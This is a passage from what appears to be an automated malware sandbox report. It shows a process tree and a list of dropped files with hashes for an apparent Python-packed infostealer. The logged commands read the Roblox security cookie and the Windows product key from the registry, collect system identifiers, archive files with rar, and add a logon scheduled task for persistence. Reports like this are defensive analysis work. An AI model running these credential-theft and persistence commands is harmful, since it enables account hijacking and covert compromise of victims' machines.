                                                  powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                  6⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:432
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                5⤵
                                                  PID:1832
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                    6⤵
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:4912
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "getmac"
                                                  5⤵
                                                    PID:2384
                                                    • C:\Windows\System32\Conhost.exe
                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      6⤵
                                                        PID:4832
                                                      • C:\Windows\system32\getmac.exe
                                                        getmac
                                                        6⤵
                                                          PID:1488
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI36082\rar.exe a -r -hp"blank" "C:\Users\Admin\AppData\Local\Temp\6BiRJ.zip" *"
                                                        5⤵
                                                          PID:3156
                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI36082\rar.exe
                                                            C:\Users\Admin\AppData\Local\Temp\_MEI36082\rar.exe a -r -hp"blank" "C:\Users\Admin\AppData\Local\Temp\6BiRJ.zip" *
                                                            6⤵
                                                            • Executes dropped EXE
                                                            PID:1612
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                          5⤵
                                                            PID:3284
                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                              wmic os get Caption
                                                              6⤵
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:976
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                            5⤵
                                                              PID:460
                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                wmic computersystem get totalphysicalmemory
                                                                6⤵
                                                                  PID:3012
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                5⤵
                                                                  PID:3276
                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                    wmic csproduct get uuid
                                                                    6⤵
                                                                      PID:3936
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                    5⤵
                                                                      PID:2788
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                        6⤵
                                                                        • Command and Scripting Interpreter: PowerShell
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        PID:4700
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                      5⤵
                                                                        PID:3580
                                                                        • C:\Windows\System32\Conhost.exe
                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          6⤵
                                                                            PID:432
                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                            wmic path win32_VideoController get name
                                                                            6⤵
                                                                            • Detects videocard installed
                                                                            PID:3300
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                          5⤵
                                                                            PID:4400
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                              6⤵
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              PID:1856
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\Built.exe""
                                                                            5⤵
                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                            PID:708
                                                                            • C:\Windows\system32\PING.EXE
                                                                              ping localhost -n 3
                                                                              6⤵
                                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                                              • Runs ping.exe
                                                                              PID:5008
                                                                    • C:\Users\Admin\AppData\Local\Temp\Core Sound Service.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\Core Sound Service.exe"
                                                                      2⤵
                                                                      • Checks computer location settings
                                                                      • Executes dropped EXE
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      • Suspicious use of WriteProcessMemory
                                                                      PID:2648
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Core Sound Service" /tr '"C:\Users\Admin\AppData\Roaming\Core Sound Service.exe"' & exit
                                                                        3⤵
                                                                          PID:1156
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            schtasks /create /f /sc onlogon /rl highest /tn "Core Sound Service" /tr '"C:\Users\Admin\AppData\Roaming\Core Sound Service.exe"'
                                                                            4⤵
                                                                            • Scheduled Task/Job: Scheduled Task
                                                                            PID:2068
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpEDAC.tmp.bat""
                                                                          3⤵
                                                                            PID:1672
                                                                            • C:\Windows\system32\timeout.exe
                                                                              timeout 3
                                                                              4⤵
                                                                              • Delays execution with timeout.exe
                                                                              PID:4380
                                                                            • C:\Users\Admin\AppData\Roaming\Core Sound Service.exe
                                                                              "C:\Users\Admin\AppData\Roaming\Core Sound Service.exe"
                                                                              4⤵
                                                                              • Executes dropped EXE
                                                                              PID:4232

                                                                      Network

                                                                      MITRE ATT&CK Enterprise v15

                                                                      Replay Monitor

                                                                      Loading Replay Monitor...

                                                                      Downloads

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                        Filesize

                                                                        3KB

                                                                        MD5

                                                                        8740e7db6a0d290c198447b1f16d5281

                                                                        SHA1

                                                                        ab54460bb918f4af8a651317c8b53a8f6bfb70cd

                                                                        SHA256

                                                                        f45b0efc0833020dfeeaad0adc8ed10b0f85e0bc491baf9e1a4da089636bccf5

                                                                        SHA512

                                                                        d91fe9666c4923c8e90e5a785db96e5613b8cb3bf28983296a2f381ccdcd73d15254268548e156c8150a9a531712602313ba65f74cec5784341c8d66b088750b

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                        Filesize

                                                                        1KB

                                                                        MD5

                                                                        33b19d75aa77114216dbc23f43b195e3

                                                                        SHA1

                                                                        36a6c3975e619e0c5232aa4f5b7dc1fec9525535

                                                                        SHA256

                                                                        b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2

                                                                        SHA512

                                                                        676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                        Filesize

                                                                        15KB

                                                                        MD5

                                                                        9bc0aa6e6bcf3115efab001a9c7c15c9

                                                                        SHA1

                                                                        5b30fa8892d4dddb77da3c0a0be9516a813f36e0

                                                                        SHA256

                                                                        7ed966a29a10f50ab6b447c58ff5cea1d0d78aa11b2959b27b69b95d6bef4635

                                                                        SHA512

                                                                        2327c72f9869d3fa2410bd27b9e216d11a7e6df57fbba6f0f128914cadd1fb8acda439ef622edf9991a94eb8006b8309fc077282a5239caa6d3a3e635d00eff9

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                        Filesize

                                                                        1KB

                                                                        MD5

                                                                        27f5f4c66338df870bab165504cf6661

                                                                        SHA1

                                                                        ea3877b3480b041ca1b4959c9747aff500f7f559

                                                                        SHA256

                                                                        e4b7b203767decc674e6a70a78f0666f88afe73b1b532db70bb8247f1b8be120

                                                                        SHA512

                                                                        fe77bacbba52f4e97b070027a01388c4cc7d18ebe208dd6ff6e79e6c0537c35c7d4c061f5f2faa71520e7c104af490458de6c3f2aedb0324b0e785cb82b87428

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                        Filesize

                                                                        944B

                                                                        MD5

                                                                        9b80cd7a712469a4c45fec564313d9eb

                                                                        SHA1

                                                                        6125c01bc10d204ca36ad1110afe714678655f2d

                                                                        SHA256

                                                                        5a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d

                                                                        SHA512

                                                                        ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                        Filesize

                                                                        18KB

                                                                        MD5

                                                                        8b541f69f29721ebe50326254c8da04d

                                                                        SHA1

                                                                        fa16666476247d4de585bc1c537969a71d9cbab1

                                                                        SHA256

                                                                        135920a085c41e3c2565102e4eaab418f2485175e817864965df475cf28fc9bc

                                                                        SHA512

                                                                        31be2c462dd5ae30fb17f806afc9bde42664f31a3b62281f6323c844c8eebfb6d51a1c8e59927b2ade48e97499162daa7b2573a0ee3e3518d09d0bb511695c39

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                        Filesize

                                                                        1KB

                                                                        MD5

                                                                        4d6e1c72576041005ad96650734aecb9

                                                                        SHA1

                                                                        99b164122826d35286bb292a621a9470d5e8e567

                                                                        SHA256

                                                                        62208cc0ada5f210a34c84e0f2677e931f1e2854c2783c54485989344a480000

                                                                        SHA512

                                                                        c655f3c0850ebdf488a2c7a57364bbc08843f7bb325d3fde539801ca615fce85f9408aa3298d678a3578c7f434503cce314c5028b4e02be5d4d6e6310330a1fe

                                                                      • C:\Users\Admin\AppData\Local\Temp\Built.exe

                                                                        Filesize

                                                                        5.9MB

                                                                        MD5

                                                                        6ef38dfd53a643a2225848759960dbac

                                                                        SHA1

                                                                        29cfc9715c4e978a82734459cef0ff9a1ce4ddc4

                                                                        SHA256

                                                                        945a4092e68d2d3a5b18b8edfd6fe23e3ee96747c05fe5a8bd98a5a3b3a34a5f

                                                                        SHA512

                                                                        1a31a137cf4071c30488e64abc50291c8a6435d68d5f873d7f53d08621bc346ca09065647fc3c0fa70fc269544461bab78060e9e61ff98435d70b87c28b8a4b1

                                                                      • C:\Users\Admin\AppData\Local\Temp\Core Sound Service.exe

                                                                        Filesize

                                                                        411KB

                                                                        MD5

                                                                        4cf5485962a77f230dc8f55b491130cd

                                                                        SHA1

                                                                        148418d84ec198032a3c384a03571dc45ee26a3d

                                                                        SHA256

                                                                        d976098cc4601c051f863f3eb9c0cb339471da6f67f6eae015b3f0239a44869b

                                                                        SHA512

                                                                        296abebc586c3bed08e8d195730e80426471f3a68833d054cbd31a09a61ba0a407844e70a5c713d67ffcc95bde7f7c0d5efc5307cee9fa88607e3117fe0b6ac5

                                                                      • C:\Users\Admin\AppData\Local\Temp\RESF7AE.tmp

                                                                        Filesize

                                                                        1KB

                                                                        MD5

                                                                        e66daf392e54fe433de9bfd69e410cb0

                                                                        SHA1

                                                                        58e2c54245b71efab63d0ccc2c6ffd5d64b23e3b

                                                                        SHA256

                                                                        bda555b59d7d93c336819bd31f1992875826931a595c534a74ae4aeb70d0c556

                                                                        SHA512

                                                                        9221be8782aae79d9c6a6eb23003315fe1a7cb9a730949c9b17e70c3f7b15c0219ebc3b92c965a0ef63ea7fd2c4409d5df2f90c1c93ba7084270c0273de9cfbb

                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI36082\VCRUNTIME140.dll

                                                                        Filesize

                                                                        106KB

                                                                        MD5

                                                                        870fea4e961e2fbd00110d3783e529be

                                                                        SHA1

                                                                        a948e65c6f73d7da4ffde4e8533c098a00cc7311

                                                                        SHA256

                                                                        76fdb83fde238226b5bebaf3392ee562e2cb7ca8d3ef75983bf5f9d6c7119644

                                                                        SHA512

                                                                        0b636a3cdefa343eb4cb228b391bb657b5b4c20df62889cd1be44c7bee94ffad6ec82dc4db79949edef576bff57867e0d084e0a597bf7bf5c8e4ed1268477e88

                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI36082\_bz2.pyd

                                                                        Filesize

                                                                        46KB

                                                                        MD5

                                                                        93fe6d3a67b46370565db12a9969d776

                                                                        SHA1

                                                                        ff520df8c24ed8aa6567dd0141ef65c4ea00903b

                                                                        SHA256

                                                                        92ec61ca9ac5742e0848a6bbb9b6b4cda8e039e12ab0f17fb9342d082dde471b

                                                                        SHA512

                                                                        5c91b56198a8295086c61b4f4e9f16900a7ec43ca4b84e793bc8a3fc8676048cab576e936515bf2971318c7847f1314674b3336fe83b1734f9f70d09615519ac

                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI36082\_ctypes.pyd

                                                                        Filesize

                                                                        56KB

                                                                        MD5

                                                                        813fc3981cae89a4f93bf7336d3dc5ef

                                                                        SHA1

                                                                        daff28bcd155a84e55d2603be07ca57e3934a0de

                                                                        SHA256

                                                                        4ac7fb7b354069e71ebf7fcc193c0f99af559010a0ad82a03b49a92deb0f4d06

                                                                        SHA512

                                                                        ce93f21b315d96fde96517a7e13f66aa840d4ad1c6e69e68389e235e43581ad543095582ebcb9d2c6dda11c17851b88f5b1ed1d59d354578fe27e7299bbea1cc

                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI36082\_decimal.pyd

                                                                        Filesize

                                                                        103KB

                                                                        MD5

                                                                        f65d2fed5417feb5fa8c48f106e6caf7

                                                                        SHA1

                                                                        9260b1535bb811183c9789c23ddd684a9425ffaa

                                                                        SHA256

                                                                        574fe8e01054a5ba07950e41f37e9cf0aea753f20fe1a31f58e19202d1f641d8

                                                                        SHA512

                                                                        030502fa4895e0d82c8cce00e78831fc3b2e6d956c8cc3b9fb5e50cb23ef07cd6942949a9f16d02da6908523d9d4ef5f722fb1336d4a80cd944c9f0cb11239ab

                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI36082\_hashlib.pyd

                                                                        Filesize

                                                                        33KB

                                                                        MD5

                                                                        4ae75c47dbdebaa16a596f31b27abd9e

                                                                        SHA1

                                                                        a11f963139c715921dedd24bc957ab6d14788c34

                                                                        SHA256

                                                                        2308ee238cc849b1110018b211b149d607bf447f4e4c1e61449049eab0cf513d

                                                                        SHA512

                                                                        e908fecb52268fac71933e2fdb96e539bdebe4675dfb50065aee26727bac53e07cca862193bcb3ab72d2ae62d660113a47e73e1e16db401480e4d3fd34d54fa8

                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI36082\_lzma.pyd

                                                                        Filesize

                                                                        84KB

                                                                        MD5

                                                                        6f810f46f308f7c6ccddca45d8f50039

                                                                        SHA1

                                                                        6ee24ff6d1c95ba67e1275bb82b9d539a7f56cea

                                                                        SHA256

                                                                        39497259b87038e86c53e7a39a0b5bbbfcebe00b2f045a148041300b31f33b76

                                                                        SHA512

                                                                        c692367a26415016e05ebe828309d3ffec290c6d2fd8cc7419d529a51b0beda00ccdc327c9f187ae3ca0cc96336d23d84a8ff95b729c8958b14fb91b6da9e878

                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI36082\_queue.pyd

                                                                        Filesize

                                                                        24KB

                                                                        MD5

                                                                        0e7612fc1a1fad5a829d4e25cfa87c4f

                                                                        SHA1

                                                                        3db2d6274ce3dbe3dbb00d799963df8c3046a1d6

                                                                        SHA256

                                                                        9f6965eb89bbf60df0c51ef0750bbd0655675110d6c42eca0274d109bd9f18a8

                                                                        SHA512

                                                                        52c57996385b9a573e3105efa09fd6fd24561589b032ef2b2ee60a717f4b33713c35989f2265669f980646d673e3c387b30b9fc98033bb8ca7c59ece1c17e517

                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI36082\_socket.pyd

                                                                        Filesize

                                                                        41KB

                                                                        MD5

                                                                        7a31bc84c0385590e5a01c4cbe3865c3

                                                                        SHA1

                                                                        77c4121abe6e134660575d9015308e4b76c69d7c

                                                                        SHA256

                                                                        5614017765322b81cc57d841b3a63cbdc88678ff605e5d4c8fdbbf8f0ac00f36

                                                                        SHA512

                                                                        b80cd51e395a3ce6f345b69243d8fc6c46e2e3828bd0a7e63673a508d889a9905d562cac29f1ed394ccfcda72f2f2e22f675963dd96261c19683b06dea0a0882

                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI36082\_sqlite3.pyd

                                                                        Filesize

                                                                        48KB

                                                                        MD5

                                                                        bb4aa2d11444900c549e201eb1a4cdd6

                                                                        SHA1

                                                                        ca3bb6fc64d66deaddd804038ea98002d254c50e

                                                                        SHA256

                                                                        f44d80ab16c27ca65da23ae5fda17eb842065f3e956f10126322b2ea3ecdf43f

                                                                        SHA512

                                                                        cd3c5704e5d99980109fdc505d39ad5b26a951685e9d8e3fed9e0848cd44e24cc4611669dbdb58acc20f1f4a5c37d5e01d9d965cf6fe74f94da1b29aa2ff6931

                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI36082\_ssl.pyd

                                                                        Filesize

                                                                        60KB

                                                                        MD5

                                                                        081c878324505d643a70efcc5a80a371

                                                                        SHA1

                                                                        8bef8336476d8b7c5c9ef71d7b7db4100de32348

                                                                        SHA256

                                                                        fcb70b58f94f5b0f9d027999cce25e99ddcc8124e4ddcc521cb5b96a52faaa66

                                                                        SHA512

                                                                        c36293b968a2f83705815ef3a207e444eeb7667ad9af61df75e85151f74f2fe0a299b3b1349de0d410bbbaea9f99cac5228189099a221de5fa1e20c97c648e32

                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI36082\base_library.zip

                                                                        Filesize

                                                                        859KB

                                                                        MD5

                                                                        6d649e03da81ff46a818ab6ee74e27e2

                                                                        SHA1

                                                                        90abc7195d2d98bac836dcc05daab68747770a49

                                                                        SHA256

                                                                        afede0c40e05ce5a50ff541b074d878b07753b7c1b21d15f69d17f66101ba8fd

                                                                        SHA512

                                                                        e39621c9a63c9c72616ae1f960e928ad4e7bad57bfb5172b296a7cc49e8b8e873be44247a475e7e1ded6bc7e17aa351397cdeb40841258e75193586f4649d737

                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI36082\blank.aes

                                                                        Filesize

                                                                        74KB

                                                                        MD5

                                                                        6736784d989389320a29bc6f04d2cd2d

                                                                        SHA1

                                                                        5586fb11b657716843ed4f65c4b3e235da4375da

                                                                        SHA256

                                                                        2c350ffe68b285c884b54e624b13a789b7cd812a3b4a386c83d5899487cafe43

                                                                        SHA512

                                                                        fe1ed06ba71e92c1b74a897f8045d850b23977e256b7ef6f67ba3ff053d07db7778dc7d20d0390932195381bd0951a223f0adfa593dc9ac06ae298b0a29551d0

                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI36082\libcrypto-1_1.dll

                                                                        Filesize

                                                                        1.1MB

                                                                        MD5

                                                                        daa2eed9dceafaef826557ff8a754204

                                                                        SHA1

                                                                        27d668af7015843104aa5c20ec6bbd30f673e901

                                                                        SHA256

                                                                        4dab915333d42f071fe466df5578fd98f38f9e0efa6d9355e9b4445ffa1ca914

                                                                        SHA512

                                                                        7044715550b7098277a015219688c7e7a481a60e4d29f5f6558b10c7ac29195c6d5377dc234da57d9def0c217bb3d7feca332a64d632ca105503849f15e057ea

                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI36082\libffi-7.dll

                                                                        Filesize

                                                                        23KB

                                                                        MD5

                                                                        6f818913fafe8e4df7fedc46131f201f

                                                                        SHA1

                                                                        bbb7ba3edbd4783f7f973d97b0b568cc69cadac5

                                                                        SHA256

                                                                        3f94ee4f23f6c7702ab0cc12995a6457bf22183fa828c30cc12288adf153ae56

                                                                        SHA512

                                                                        5473fe57dc40af44edb4f8a7efd68c512784649d51b2045d570c7e49399990285b59cfa6bcd25ef1316e0a073ea2a89fe46be3bfc33f05e3333037a1fd3a6639

                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI36082\libssl-1_1.dll

                                                                        Filesize

                                                                        203KB

                                                                        MD5

                                                                        eac369b3fde5c6e8955bd0b8e31d0830

                                                                        SHA1

                                                                        4bf77158c18fe3a290e44abd2ac1834675de66b4

                                                                        SHA256

                                                                        60771fb23ee37b4414d364e6477490324f142a907308a691f3dd88dc25e38d6c

                                                                        SHA512

                                                                        c51f05d26fda5e995fe6763877d4fcdb89cd92ef2d6ee997e49cc1ee7a77146669d26ec00ad76f940ef55adae82921dede42e55f51bd10d1283ecfe7c5009778

                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI36082\python310.dll

                                                                        Filesize

                                                                        1.4MB

                                                                        MD5

                                                                        178a0f45fde7db40c238f1340a0c0ec0

                                                                        SHA1

                                                                        dcd2d3d14e06da3e8d7dc91a69b5fd785768b5fe

                                                                        SHA256

                                                                        9fcb5ad15bd33dd72122a171a5d950e8e47ceda09372f25df828010cde24b8ed

                                                                        SHA512

                                                                        4b790046787e57b9414a796838a026b1530f497a75c8e62d62b56f8c16a0cbedbefad3d4be957bc18379f64374d8d3bf62d3c64b53476c7c5005a7355acd2cee

                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI36082\rar.exe

                                                                        Filesize

                                                                        615KB

                                                                        MD5

                                                                        9c223575ae5b9544bc3d69ac6364f75e

                                                                        SHA1

                                                                        8a1cb5ee02c742e937febc57609ac312247ba386

                                                                        SHA256

                                                                        90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

                                                                        SHA512

                                                                        57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI36082\rarreg.key

                                                                        Filesize

                                                                        456B

                                                                        MD5

                                                                        4531984cad7dacf24c086830068c4abe

                                                                        SHA1

                                                                        fa7c8c46677af01a83cf652ef30ba39b2aae14c3

                                                                        SHA256

                                                                        58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

                                                                        SHA512

                                                                        00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI36082\select.pyd

                                                                        Filesize

                                                                        24KB

                                                                        MD5

                                                                        666358e0d7752530fc4e074ed7e10e62

                                                                        SHA1

                                                                        b9c6215821f5122c5176ce3cf6658c28c22d46ba

                                                                        SHA256

                                                                        6615c62fa010bfba5527f5da8af97313a1af986f8564277222a72a1731248841

                                                                        SHA512

                                                                        1d3d35c095892562ddd2868fbd08473e48b3bb0cb64ef9ccc5550a06c88dda0d82383a1316b6c5584a49ca28ed1ef1e5ca94ec699a423a001ccd952bd6bd553d

                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI36082\sqlite3.dll

                                                                        Filesize

                                                                        608KB

                                                                        MD5

                                                                        bd2819965b59f015ec4233be2c06f0c1

                                                                        SHA1

                                                                        cff965068f1659d77be6f4942ca1ada3575ca6e2

                                                                        SHA256

                                                                        ab072d20cee82ae925dae78fd41cae7cd6257d14fd867996382a69592091d8ec

                                                                        SHA512

                                                                        f7758bd71d2ad236bf3220db0ad26f3866d9977eab311a5912f6e079b59fa918735c852de6dbf7b5fee9e04124bc0cd438c4c71edc0c04309330108ba0085d59

                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI36082\unicodedata.pyd

                                                                        Filesize

                                                                        287KB

                                                                        MD5

                                                                        7a462a10aa1495cef8bfca406fb3637e

                                                                        SHA1

                                                                        6dcbd46198b89ef3007c76deb42ab10ba4c4cf40

                                                                        SHA256

                                                                        459bca991fcb88082d49d22cc6ebffe37381a5bd3efcc77c5a52f7a4bb3184c0

                                                                        SHA512

                                                                        d2b7c6997b4bd390257880a6f3336e88d1dd7159049811f8d7c54e3623e9b033e18e8922422869c81de72fc8c10890c173d8a958d192dd03bfc57cffaea1ac7b

                                                                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vu51ss3y.esr.ps1

                                                                        Filesize

                                                                        60B

                                                                        MD5

                                                                        d17fe0a3f47be24a6453e9ef58c94641

                                                                        SHA1

                                                                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                        SHA256

                                                                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                        SHA512

                                                                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                      • C:\Users\Admin\AppData\Local\Temp\cw4ihhbk\cw4ihhbk.dll

                                                                        Filesize

                                                                        4KB

                                                                        MD5

                                                                        0e742a5d6e7fc56aba09c804d75c944b

                                                                        SHA1

                                                                        9889f70bae48c57e2ef5d2f260fd5a8f202f8eef

                                                                        SHA256

                                                                        166d9c6ebbb21e2f5040e55093e0effa7dc276c6b0917b2236281805691308ec

                                                                        SHA512

                                                                        b4a0ef863b4a0aa97eb0b8de143eec3f915fde9de85842ce4497c863735cc924cd849591c0312fc36baba51e403e01f3b933ed1712d3ccb3561210ffeee4c95f

                                                                      • C:\Users\Admin\AppData\Local\Temp\munchenclients.exe

                                                                        Filesize

                                                                        5.9MB

                                                                        MD5

                                                                        ea11d7c22e4b34f7acccaa5154263a6c

                                                                        SHA1

                                                                        1bdfc6ec9aa260783546ed35fcc996cedda7b193

                                                                        SHA256

                                                                        e1776f0997d5d91ca25490e8948e449fefbf4d56ef442b64cc1bf94fb680c661

                                                                        SHA512

                                                                        47b95e0f54fc4975788e55a784066577cd70512cd0508e8d13c256cac72f768c0d3b505411275d885108047fd1459da09ac76d567d8eeb455b3768ae1a778272

                                                                      • C:\Users\Admin\AppData\Local\Temp\tmpEDAC.tmp.bat

                                                                        Filesize

                                                                        162B

                                                                        MD5

                                                                        cd3bbbb6dccde543e9de738f1cd64ce9

                                                                        SHA1

                                                                        1a1d3bbee469b571e4eca35b9a1dd75492348767

                                                                        SHA256

                                                                        00e9af11e63b940f2d3f56dc5ac51148d71a179f49d6f2b52f2f277ebf1485de

                                                                        SHA512

                                                                        d5fb3014515c3e4e583d5069c40c78e9d53022962a046f194ea358de121b9d0f06c1b00e949c2ddd38a48ec4ba9f93cd0d06838559fe288e8e3502746a83922b

                                                                      • C:\Users\Admin\AppData\Local\Temp\‏‌  ‎    ‏\Common Files\Desktop\BackupReset.dotx

                                                                        Filesize

                                                                        483KB

                                                                        MD5

                                                                        e4204fd418050572a7c5991b9bdb20e7

                                                                        SHA1

                                                                        87c425d6a56395c0a318220e79978f620619ee65

                                                                        SHA256

                                                                        c6d993f31333991716d42d94ce32a733439b017f6e18f8816856163d3809e46e

                                                                        SHA512

                                                                        153d52b59846687f4d33160eecc5428d27863866f4f8bf3131ada78f2270947f61e56264cfb3efc1cd216633e93870d55da16b64c09fe4a3fa31b99aeed7a893

                                                                      • \??\c:\Users\Admin\AppData\Local\Temp\cw4ihhbk\CSC8DA6D9AA28243E09C24A7FF9A6837B2.TMP

                                                                        Filesize

                                                                        652B

                                                                        MD5

                                                                        3052221a796fb5915c31cb830078fe61

                                                                        SHA1

                                                                        012b429c7b529788d8f656135acc2de3d7c39b6a

                                                                        SHA256

                                                                        3d2e579e9d93d81050ffc9dd868745cef65aae34c5dfaf435b4d347d7eaca86a

                                                                        SHA512

                                                                        01aedf98ef540ebac34470d81f88ca1c062c88c719fe223b0fcc9bf48559160d79756cbcb2931553edbe05b2888a30035051071aa98d8a67270f1ca54a815267

                                                                      • \??\c:\Users\Admin\AppData\Local\Temp\cw4ihhbk\cw4ihhbk.0.cs

                                                                        Filesize

                                                                        1004B

                                                                        MD5

                                                                        c76055a0388b713a1eabe16130684dc3

                                                                        SHA1

                                                                        ee11e84cf41d8a43340f7102e17660072906c402

                                                                        SHA256

                                                                        8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

                                                                        SHA512

                                                                        22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

                                                                      • \??\c:\Users\Admin\AppData\Local\Temp\cw4ihhbk\cw4ihhbk.cmdline

                                                                        Filesize

                                                                        607B

                                                                        MD5

                                                                        bd18142945317f0cc0199fdabbce6bd6

                                                                        SHA1

                                                                        348bf66c1cea739495d7e7cfcacdaa99a482f30a

                                                                        SHA256

